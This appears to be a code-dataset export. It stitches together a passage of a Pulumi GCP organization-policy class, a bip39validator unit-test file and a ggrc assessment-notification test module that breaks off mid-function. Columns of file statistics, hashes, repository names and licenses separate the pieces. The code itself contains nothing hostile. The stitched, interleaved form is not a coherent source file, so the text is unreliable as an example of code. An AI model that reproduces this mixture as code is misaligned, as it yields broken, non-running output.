        __props__ = _PolicyState.__new__(_PolicyState)

        __props__.__dict__["boolean_policy"] = boolean_policy
        __props__.__dict__["constraint"] = constraint
        __props__.__dict__["etag"] = etag
        __props__.__dict__["list_policy"] = list_policy
        __props__.__dict__["org_id"] = org_id
        __props__.__dict__["restore_policy"] = restore_policy
        __props__.__dict__["update_time"] = update_time
        __props__.__dict__["version"] = version
        return Policy(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="booleanPolicy")
    def boolean_policy(self) -> pulumi.Output[Optional['outputs.PolicyBooleanPolicy']]:
        """
        A boolean policy is a constraint that is either enforced or not. Structure is documented below.
        """
        return pulumi.get(self, "boolean_policy")

    @property
    @pulumi.getter
    def constraint(self) -> pulumi.Output[str]:
        """
        The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
        """
        return pulumi.get(self, "constraint")

    @property
    @pulumi.getter
    def etag(self) -> pulumi.Output[str]:
        """
        (Computed) The etag of the organization policy. `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other.
        """
        return pulumi.get(self, "etag")

    @property
    @pulumi.getter(name="listPolicy")
    def list_policy(self) -> pulumi.Output[Optional['outputs.PolicyListPolicy']]:
        """
        A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
        """
        return pulumi.get(self, "list_policy")

    @property
    @pulumi.getter(name="orgId")
    def org_id(self) -> pulumi.Output[str]:
        """
        The numeric ID of the organization to set the policy for.
        """
        return pulumi.get(self, "org_id")

    @property
    @pulumi.getter(name="restorePolicy")
    def restore_policy(self) -> pulumi.Output[Optional['outputs.PolicyRestorePolicy']]:
        """
        A restore policy is a constraint to restore the default policy. Structure is documented below.
        """
        return pulumi.get(self, "restore_policy")

    @property
    @pulumi.getter(name="updateTime")
    def update_time(self) -> pulumi.Output[str]:
        """
        (Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z".
        """
        return pulumi.get(self, "update_time")

    @property
    @pulumi.getter
    def version(self) -> pulumi.Output[int]:
        """
        Version of the Policy. Default version is 0.
        """
        return pulumi.get(self, "version")
| 47.771429
| 307
| 0.667077
| 3,249
| 28,424
| 5.676208
| 0.078793
| 0.056068
| 0.057694
| 0.022666
| 0.903861
| 0.889166
| 0.86585
| 0.848606
| 0.833424
| 0.814391
| 0
| 0.009583
| 0.23642
| 28,424
| 594
| 308
| 47.851852
| 0.840122
| 0.476851
| 0
| 0.695167
| 1
| 0
| 0.134179
| 0.040215
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159851
| false
| 0.003717
| 0.026022
| 0
| 0.282528
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
073993288533c56b6b371dba51632083cb4a9829
| 4,895
|
py
|
Python
|
tests/test_inituniqresult.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | 3
|
2021-02-11T20:37:56.000Z
|
2021-06-11T03:29:15.000Z
|
tests/test_inituniqresult.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | 4
|
2020-10-04T23:11:08.000Z
|
2020-12-23T00:32:52.000Z
|
tests/test_inituniqresult.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from bip39validator.BIP39WordList import BIP39WordList
# Fixture: two words sharing one common initial-character group ("qu").
inituniq_2group_l3 = """quick
quote"""

# Fixture: four words forming two initial-character groups ("qu" and "ri").
inituniq_4group_l3 = """quick
quote
risk
rich"""
class TestInitUniqResult(TestCase):
    """Tests for the result object returned by BIP39WordList.test_initial_chars.

    Fixes over the previous version:

    * The negative checks used ``try: fn(t); self.fail() except AssertionError:
      pass``.  Since ``self.fail()`` itself raises AssertionError, the handler
      swallowed it and the check could never fail.  ``assertRaises`` is used
      instead so invalid inputs are actually verified to be rejected.
    * ``test_groups_length`` mistakenly exercised ``similar_wordgroup_all`` in
      its negative-input loop (copy-paste error); it now exercises
      ``groups_length``.
    """

    def _result_for(self, name, wordlist):
        """Build a BIP39WordList from a fixture string and run the 3-char initial-uniqueness test."""
        return BIP39WordList(name, string=wordlist).test_initial_chars(3)

    def _assert_rejects(self, func, bad_inputs):
        """Assert that ``func`` raises AssertionError for each invalid input."""
        for bad in bad_inputs:
            with self.assertRaises(AssertionError):
                func(bad)

    def test_similargroup(self):
        res = self._result_for("inituniq_2group_l3", inituniq_2group_l3)
        expected_res = [("quick", 1), ("quote", 2)]
        self.assertEqual(expected_res, res.similargroup("qu"))
        self._assert_rejects(res.similargroup, [0, ""])

    def test_similar_wordgroup(self):
        res = self._result_for("inituniq_2group_l3", inituniq_2group_l3)
        expected_res = ["quick", "quote"]
        self.assertEqual(expected_res, res.similar_wordgroup("qu"))
        self._assert_rejects(res.similar_wordgroup, [0, ""])

    def test_similar_linegroup(self):
        res = self._result_for("inituniq_2group_l3", inituniq_2group_l3)
        expected_res = [1, 2]
        self.assertEqual(expected_res, res.similar_linegroup("qu"))
        self._assert_rejects(res.similar_linegroup, [0, ""])

    def test_similargroup_many(self):
        res = self._result_for("inituniq_4group_l3", inituniq_4group_l3)
        expected_res = {"qu": [("quick", 1), ("quote", 2)],
                        "ri": [("rich", 4), ("risk", 3)]}
        self.assertEqual(expected_res, res.similargroup_many(["qu", "ri"]))
        self._assert_rejects(res.similargroup_many, ["abc", [], ["a"], 0])

    def test_similar_wordgroup_many(self):
        res = self._result_for("inituniq_4group_l3", inituniq_4group_l3)
        expected_res = {"qu": ["quick", "quote"],
                        "ri": ["rich", "risk"]}
        self.assertEqual(expected_res, res.similar_wordgroup_many(["qu", "ri"]))
        self._assert_rejects(res.similar_wordgroup_many, ["abc", [], ["a"], 0])

    def test_similar_linegroup_many(self):
        res = self._result_for("inituniq_4group_l3", inituniq_4group_l3)
        expected_res = {"qu": [1, 2],
                        "ri": [4, 3]}
        self.assertEqual(expected_res, res.similar_linegroup_many(["qu", "ri"]))
        self._assert_rejects(res.similar_linegroup_many, ["abc", [], ["a"], 0])

    def test_similargroup_all(self):
        res = self._result_for("inituniq_2group_l3", inituniq_2group_l3)
        expected_res = {"qu": [("quick", 1), ("quote", 2)]}
        self.assertEqual(expected_res, res.similargroup_all(2))
        self._assert_rejects(res.similargroup_all, [0, ""])

    def test_similar_wordgroup_all(self):
        res = self._result_for("inituniq_2group_l3", inituniq_2group_l3)
        expected_res = {"qu": ["quick", "quote"]}
        self.assertEqual(expected_res, res.similar_wordgroup_all(2))
        self._assert_rejects(res.similar_wordgroup_all, [0, ""])

    def test_similar_linegroup_all(self):
        res = self._result_for("inituniq_2group_l3", inituniq_2group_l3)
        expected_res = {"qu": [1, 2]}
        self.assertEqual(expected_res, res.similar_linegroup_all(2))
        self._assert_rejects(res.similar_linegroup_all, [0, ""])

    def test_groups_length(self):
        res = self._result_for("inituniq_2group_l3", inituniq_2group_l3)
        expected_res = {"qu": [("quick", 1), ("quote", 2)]}
        self.assertEqual(expected_res, res.groups_length(2))
        # Previously this loop called similar_wordgroup_all by mistake.
        self._assert_rejects(res.groups_length, [0, ""])
| 36.259259
| 80
| 0.566088
| 549
| 4,895
| 4.803279
| 0.096539
| 0.083428
| 0.091013
| 0.113766
| 0.906712
| 0.899886
| 0.88358
| 0.834661
| 0.801289
| 0.720137
| 0
| 0.045346
| 0.31522
| 4,895
| 134
| 81
| 36.529851
| 0.741348
| 0
| 0
| 0.606557
| 0
| 0
| 0.071093
| 0
| 0
| 0
| 0
| 0
| 0.163934
| 1
| 0.081967
| false
| 0.081967
| 0.016393
| 0
| 0.106557
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
0762086a89758c3f2bcdb308ff2aa71b96bd9546
| 52,892
|
py
|
Python
|
test/integration/ggrc/notifications/test_assignable_notifications.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-01-12T23:46:00.000Z
|
2019-01-12T23:46:00.000Z
|
test/integration/ggrc/notifications/test_assignable_notifications.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
test/integration/ggrc/notifications/test_assignable_notifications.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# pylint: disable=invalid-name,too-many-lines
"""Tests for notifications for models with assignable mixin."""
import unittest
from collections import OrderedDict
from datetime import datetime
import ddt
from freezegun import freeze_time
from mock import patch
from ggrc import db
from ggrc.models import Assessment
from ggrc.models import CustomAttributeDefinition
from ggrc.models import CustomAttributeValue
from ggrc.models import Revision
from ggrc.models import all_models
from ggrc.utils import errors
from integration.ggrc import api_helper, generator
from integration.ggrc.models import factories
from integration.ggrc.models.factories import \
CustomAttributeDefinitionFactory as CAD
from integration.ggrc.notifications import TestNotifications
class TestAssignableNotification(TestNotifications):
  """Base class for testing notification creation for assignable mixin."""

  def setUp(self):
    super(TestAssignableNotification, self).setUp()
    # Log the test client in before exercising any endpoints.
    self.client.get("/login")
    self._fix_notification_init()
    # Shared audit fixture referenced by the imported CSV files.
    factories.AuditFactory(slug="Audit")
class TestAssignableNotificationUsingImports(TestAssignableNotification):
"""Tests for notifications when interacting with objects through imports."""
  @patch("ggrc.notifications.common.send_email")
  def test_assessment_created_notifications(self, send_email):
    """Test if importing new assessments results in notifications for all."""
    # No notifications exist before the import.
    self.assertEqual(self._get_notifications().count(), 0)

    # safe=False: allow the template import to proceed despite reported
    # issues — TODO confirm this matches the template file's expectations.
    self.import_file("assessment_template_no_warnings.csv", safe=False)
    self.import_file("assessment_with_templates.csv")
    titles = [asmt.title for asmt in Assessment.query]

    query = self._get_notifications(notif_type="assessment_open")
    self.assertEqual(query.count(), 6)

    # check email content
    self.client.get("/_notifications/send_daily_digest")
    recipient, _, content = send_email.call_args[0]

    self.assertEqual(recipient, u"user@example.com")
    self.assertIn(u"New assessments were created", content)
    # The digest must mention every imported assessment by title.
    for asmt_title in titles:
      self.assertIn(asmt_title, content)
  @patch("ggrc.notifications.common.send_email")
  def test_assessment_updated_notifications(self, send_email):
    """Test if updating an assessment results in a notification."""
    self.import_file("assessment_template_no_warnings.csv", safe=False)
    self.import_file("assessment_with_templates.csv")
    asmts = {asmt.slug: asmt for asmt in Assessment.query}

    asmt = Assessment.query.get(asmts["A 1"].id)
    # Keep plain values: the ORM instance expires after commit/digest calls.
    asmt_id, asmt_slug = asmt.id, asmt.slug
    asmt.status = Assessment.PROGRESS_STATE
    db.session.commit()

    # Drain pending notifications so the update below starts from zero.
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    asmt = Assessment.query.get(asmt_id)
    self.import_data(OrderedDict([
        (u"object_type", u"Assessment"),
        (u"Code*", asmt.slug),
        (u"Title", u"New Assessment 1 title"),
    ]))

    query = self._get_notifications(notif_type="assessment_updated")
    self.assertEqual(query.count(), 1)

    # check email content
    self.client.get("/_notifications/send_daily_digest")
    recipient, _, content = send_email.call_args[0]

    self.assertEqual(recipient, u"user@example.com")
    self.assertIn(u"Assessments have been updated", content)

    # the assessment updated notification should be sent even if there exists a
    # status change notification , regardless of the order of actions
    self.import_data(OrderedDict([
        (u"object_type", u"Assessment"),
        (u"Code*", asmt_slug),
        (u"Title", u"New Assessment 1 title 2"),
    ]))
    query = self._get_notifications(notif_type="assessment_updated")
    self.assertEqual(query.count(), 1)

    # Title change after a state change: the updated notification must survive.
    self.import_data(OrderedDict([
        (u"object_type", u"Assessment"),
        (u"Code*", asmt_slug),
        (u"State*", Assessment.DONE_STATE),
    ]))
    self.import_data(OrderedDict([
        (u"object_type", u"Assessment"),
        (u"Code*", asmt_slug),
        (u"Title", u"New Assessment 1 title 3"),
    ]))

    self.client.get("/_notifications/send_daily_digest")
    recipient, _, content = send_email.call_args[0]
    self.assertIn(u"Assessments have been updated", content)
  @unittest.skip("An issue needs to be fixed.")
  @patch("ggrc.notifications.common.send_email")
  def test_assessment_ca_updated_notifications(self, send_email):
    """Test if updating assessment custom attr. results in a notification."""
    # Global custom attribute definition that the import below fills in.
    CAD(definition_type="assessment", title="CA_misc_remarks")

    self.import_file("assessment_template_no_warnings.csv")
    self.import_file("assessment_with_templates.csv")

    # Drain pending notifications before the custom-attribute update.
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    asmts = {asmt.slug: asmt for asmt in Assessment.query}
    asmt = Assessment.query.get(asmts["A 1"].id)

    self.import_data(OrderedDict([
        (u"object_type", u"Assessment"),
        (u"Code*", asmt.slug),
        (u"CA_misc_remarks", u"CA new value"),
    ]))

    # NOTE(review): this re-fetch is never used afterwards — likely leftover.
    asmt = Assessment.query.get(asmts["A 1"].id)

    query = self._get_notifications(notif_type="assessment_updated")
    self.assertEqual(query.count(), 1)

    # check email content
    self.client.get("/_notifications/send_daily_digest")
    recipient, _, content = send_email.call_args[0]

    self.assertEqual(recipient, u"user@example.com")
    self.assertIn(u"Assessments have been updated", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_url_updated_notifications(self, send_email):
  """Test if updating assessment URLs results in a notification."""
  self.import_file("assessment_template_no_warnings.csv")
  self.import_file("assessment_with_templates.csv")

  by_slug = {item.slug: item for item in Assessment.query}
  asmt_id = by_slug["A 1"].id

  # move the assessment to an active state so an edit counts as an update
  asmt = Assessment.query.get(asmt_id)
  asmt.status = Assessment.PROGRESS_STATE
  db.session.commit()

  # flush any pending notifications before making the change under test
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  asmt = Assessment.query.get(asmt_id)
  self.import_data(OrderedDict((
      (u"object_type", u"Assessment"),
      (u"Code*", asmt.slug),
      (u"Evidence Url", u"www.foo-url.bar"),
  )))

  updated = self._get_notifications(notif_type="assessment_updated")
  self.assertEqual(updated.count(), 1)

  # the daily digest email must mention the update
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Assessments have been updated", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_attaching_assessment_evidence_notifications(self, send_email):
  """Test if attaching assessment evidence results in a notification."""
  self.import_file("assessment_template_no_warnings.csv")
  self.import_file("assessment_with_templates.csv")

  by_slug = {item.slug: item for item in Assessment.query}
  asmt_id = by_slug["A 1"].id

  # put the assessment into an active state first
  asmt = Assessment.query.get(asmt_id)
  asmt.status = Assessment.PROGRESS_STATE
  db.session.commit()

  # clear notifications produced so far
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  asmt = Assessment.query.get(asmt_id)
  self.import_data(OrderedDict((
      (u"object_type", u"Assessment"),
      (u"Code*", asmt.slug),
      (u"Evidence File", u"https://gdrive.com/qwerty1/view evidence.txt"),
  )))

  updated = self._get_notifications(notif_type="assessment_updated")
  self.assertEqual(updated.count(), 1)

  # the digest email must mention the update
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Assessments have been updated", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_person_updated_notifications(self, send_email):
  """Test if updating assessment people results in a notification."""
  self.import_file("assessment_template_no_warnings.csv")
  self.import_file("assessment_with_templates.csv")

  asmts = {asmt.slug: asmt for asmt in Assessment.query}
  asmt = Assessment.query.get(asmts["A 1"].id)
  asmt_id = asmt.id
  asmt.status = Assessment.PROGRESS_STATE
  db.session.commit()

  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  asmt = Assessment.query.get(asmt_id)
  # change assignee
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt.slug),
      (u"Assignee*", u"john@doe.com"),
  ]))
  query = self._get_notifications(notif_type="assessment_updated")
  self.assertEqual(query.count(), 1)

  # clear notifications
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  # change verifier (re-fetch once -- the session was lost by the GET above;
  # the original code fetched the object twice in a row, the dead first
  # fetch has been removed)
  asmt = Assessment.query.get(asmt_id)
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt.slug),
      (u"Verifiers", u"bob@dylan.com"),
  ]))
  query = self._get_notifications(notif_type="assessment_updated")
  self.assertEqual(query.count(), 1)

  # check email content
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Assessments have been updated", content)
@patch("ggrc.notifications.common.send_email")
def test_assessment_state_change_notifications(self, send_email):
  """Test if updating assessment state results in notifications.

  Walks a single assessment through its full state machine (start, submit
  for review, verify, reopen, undo, decline, direct submit, direct
  complete) and checks that each transition produces exactly the expected
  notification type and digest email wording.  The digest endpoint is hit
  between steps to flush pending notifications, so statement order here is
  significant.
  """
  # pylint: disable=too-many-statements
  self.import_file("assessment_template_no_warnings.csv", safe=False)
  self.import_file("assessment_with_templates.csv")
  asmts = {asmt.slug: asmt for asmt in Assessment.query}
  asmt = Assessment.query.get(asmts["A 1"].id)
  asmt_id, asmt_slug = asmt.id, asmt.slug

  # test starting an assessment
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"State*", Assessment.PROGRESS_STATE),
  ]))
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertRegexpMatches(content, ur"Assessment\s+has\s+been\s+started")

  # test submitting assessment for review
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"State*", Assessment.DONE_STATE),
  ]))
  query = self._get_notifications(notif_type="assessment_ready_for_review")
  self.assertEqual(query.count(), 1)
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Assessments in review", content)

  # test verifying an assessment
  self.assertEqual(self._get_notifications().count(), 0)
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"State*", Assessment.FINAL_STATE),
      # (will get verified, because there is a verifier assigned)
  ]))
  query = self._get_notifications(notif_type="assessment_verified")
  self.assertEqual(query.count(), 1)
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Verified assessments", content)

  # test reopening a verified assessment
  self.assertEqual(self._get_notifications().count(), 0)
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"State*", Assessment.PROGRESS_STATE),
  ]))
  query = self._get_notifications(notif_type="assessment_reopened")
  self.assertEqual(query.count(), 1)
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Reopened assessments", content)

  # sending an assessment back to "in review" (i.e. the undo action)
  asmt = Assessment.query.get(asmt_id)
  asmt.status = Assessment.VERIFIED_STATE
  db.session.commit()
  self.assertEqual(self._get_notifications().count(), 0)
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"State*", Assessment.DONE_STATE),
  ]))
  query = self._get_notifications()
  self.assertEqual(query.count(), 0)  # there should be no notification!

  # test declining an assessment
  asmt = Assessment.query.get(asmt_id)
  asmt.status = Assessment.DONE_STATE
  db.session.commit()
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"State*", Assessment.PROGRESS_STATE),
  ]))
  # declining produces BOTH a "declined" and a "reopened" notification
  query = self._get_notifications(notif_type="assessment_declined")
  self.assertEqual(query.count(), 1)
  query = self._get_notifications(notif_type="assessment_reopened")
  self.assertEqual(query.count(), 1)
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Declined assessments", content)
  self.assertIn(u"Reopened assessments", content)

  # directly submitting a not started assessment for review
  asmt = Assessment.query.get(asmt_id)
  asmt.status = Assessment.START_STATE
  db.session.commit()
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"State*", Assessment.DONE_STATE),
  ]))
  query = self._get_notifications(notif_type="assessment_ready_for_review")
  self.assertEqual(query.count(), 1)
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Assessments in review", content)

  # directly completing a not started assessment
  # (the verifier is removed so FINAL means "completed", not "verified")
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"Verifiers", None),
      (u"State*", Assessment.START_STATE),
  ]))
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"State*", Assessment.FINAL_STATE),
  ]))
  query = self._get_notifications(notif_type="assessment_completed")
  self.assertEqual(query.count(), 1)
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Completed assessments", content)

  # test reopening a completed assessment
  self.assertEqual(self._get_notifications().count(), 0)
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"State*", Assessment.PROGRESS_STATE),
  ]))
  query = self._get_notifications(notif_type="assessment_reopened")
  self.assertEqual(query.count(), 1)
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Reopened assessments", content)

  # completing an assessment in progress
  self.assertEqual(self._get_notifications().count(), 0)
  self.import_data(OrderedDict([
      (u"object_type", u"Assessment"),
      (u"Code*", asmt_slug),
      (u"State*", Assessment.FINAL_STATE),
  ]))
  query = self._get_notifications(notif_type="assessment_completed")
  self.assertEqual(query.count(), 1)
  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  self.assertIn(u"Completed assessments", content)
@patch("ggrc.notifications.common.send_email")
def test_multiple_assessment_state_changes_notification(self, send_email):
  """Test if several assessment state changes result in a single notification.

  Users should only be notified about the last state change, and not about
  every state change that happened.
  """
  self.import_file("assessment_template_no_warnings.csv", safe=False)
  self.import_file("assessment_with_templates.csv")

  by_slug = {item.slug: item for item in Assessment.query}
  asmt = Assessment.query.get(by_slug["A 1"].id)
  asmt_slug = asmt.slug
  asmt.status = Assessment.START_STATE
  db.session.commit()

  # start from a clean notification slate
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  # make multiple state transitions and check that only the last one is
  # actually retained
  transitions = (
      Assessment.PROGRESS_STATE,
      Assessment.DONE_STATE,
      Assessment.PROGRESS_STATE,
      Assessment.FINAL_STATE,
  )
  for target_state in transitions:
    self.import_data(OrderedDict((
        (u"object_type", u"Assessment"),
        (u"Code*", asmt_slug),
        (u"State*", target_state),
    )))

  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  # only the final (completed) transition may appear in the digest
  self.assertNotIn(u"Assessments in review", content)
  self.assertNotIn(u"Declined assessments", content)
  self.assertNotIn(u"Reopened assessments", content)
  self.assertIn(u"Completed assessments", content)
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_edit(self, send_email):
  """Test if updating assessment results in reopen notification."""
  self.import_file("assessment_template_no_warnings.csv", safe=False)
  self.import_file("assessment_with_templates.csv")

  by_slug = {item.slug: item for item in Assessment.query}
  asmt = Assessment.query.get(by_slug["A 1"].id)
  asmt_id, asmt_slug = asmt.id, asmt.slug

  for idx, done_state in enumerate(Assessment.DONE_STATES):
    # put the assessment into a "done" state and flush notifications
    asmt = Assessment.query.get(asmt_id)
    asmt.status = done_state
    db.session.commit()
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    # editing the title must reopen the assessment
    self.import_data(OrderedDict((
        (u"object_type", u"Assessment"),
        (u"Code*", asmt_slug),
        (u"Title", u"New Assessment 1 title - " + unicode(idx)),
    )))
    reopened = self._get_notifications(notif_type="assessment_reopened")
    self.assertEqual(reopened.count(), 1)

    self.client.get("/_notifications/send_daily_digest")
    recipient, _, content = send_email.call_args[0]
    self.assertEqual(recipient, u"user@example.com")
    self.assertIn(u"Reopened assessments", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_ca_edit(self, send_email):
  """Test if updating assessment's CA value in reopen notification."""
  CAD(definition_type="assessment", title="CA_misc_remarks")
  self.import_file("assessment_template_no_warnings.csv")
  self.import_file("assessment_with_templates.csv")

  by_slug = {item.slug: item for item in Assessment.query}
  asmt = Assessment.query.get(by_slug["A 1"].id)
  asmt_id, asmt_slug = asmt.id, asmt.slug

  for idx, done_state in enumerate(Assessment.DONE_STATES):
    # move the assessment into a "done" state, then flush notifications
    asmt = Assessment.query.get(asmt_id)
    asmt.status = done_state
    db.session.commit()
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    # changing a custom attribute value must reopen the assessment
    self.import_data(OrderedDict((
        (u"object_type", u"Assessment"),
        (u"Code*", asmt_slug),
        (u"CA_misc_remarks", u"CA new value" + unicode(idx)),
    )))
    reopened = self._get_notifications(notif_type="assessment_reopened")
    self.assertEqual(reopened.count(), 1)

    self.client.get("/_notifications/send_daily_digest")
    recipient, _, content = send_email.call_args[0]
    self.assertEqual(recipient, u"user@example.com")
    self.assertIn(u"Reopened assessments", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_url_edit(self, send_email):
  """Test if updating assessment's URLs results in reopen notification."""
  self.import_file("assessment_template_no_warnings.csv")
  self.import_file("assessment_with_templates.csv")

  by_slug = {item.slug: item for item in Assessment.query}
  asmt = Assessment.query.get(by_slug["A 1"].id)
  asmt_id, asmt_slug = asmt.id, asmt.slug

  for idx, done_state in enumerate(Assessment.DONE_STATES):
    # park the assessment in a "done" state and clear notifications
    asmt = Assessment.query.get(asmt_id)
    asmt.status = done_state
    db.session.commit()
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    # adding an evidence URL must reopen the assessment
    self.import_data(OrderedDict((
        (u"object_type", u"Assessment"),
        (u"Code*", asmt_slug),
        (u"Evidence Url", u"www.foo-url-{}.bar".format(idx)),
    )))
    reopened = self._get_notifications(notif_type="assessment_reopened")
    self.assertEqual(reopened.count(), 1)

    self.client.get("/_notifications/send_daily_digest")
    recipient, _, content = send_email.call_args[0]
    self.assertEqual(recipient, u"user@example.com")
    self.assertIn(u"Reopened assessments", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_evidence_change(
    self, send_email
):
  """Test if assessment evidence change results in reopen notification."""
  self.import_file("assessment_template_no_warnings.csv")
  self.import_file("assessment_with_templates.csv")

  by_slug = {item.slug: item for item in Assessment.query}
  asmt = Assessment.query.get(by_slug["A 1"].id)
  asmt_id, asmt_slug = asmt.id, asmt.slug

  for idx, done_state in enumerate(Assessment.DONE_STATES):
    # park the assessment in a "done" state and clear notifications
    asmt = Assessment.query.get(asmt_id)
    asmt.status = done_state
    db.session.commit()
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    # attaching an evidence file must reopen the assessment
    evidence = u"https://gdrive.com/qwerty{0}/view evidence-{0}.txt".format(idx)
    self.import_data(OrderedDict((
        (u"object_type", u"Assessment"),
        (u"Code*", asmt_slug),
        (u"Evidence File", evidence),
    )))
    reopened = self._get_notifications(notif_type="assessment_reopened")
    self.assertEqual(reopened.count(), 1)

    self.client.get("/_notifications/send_daily_digest")
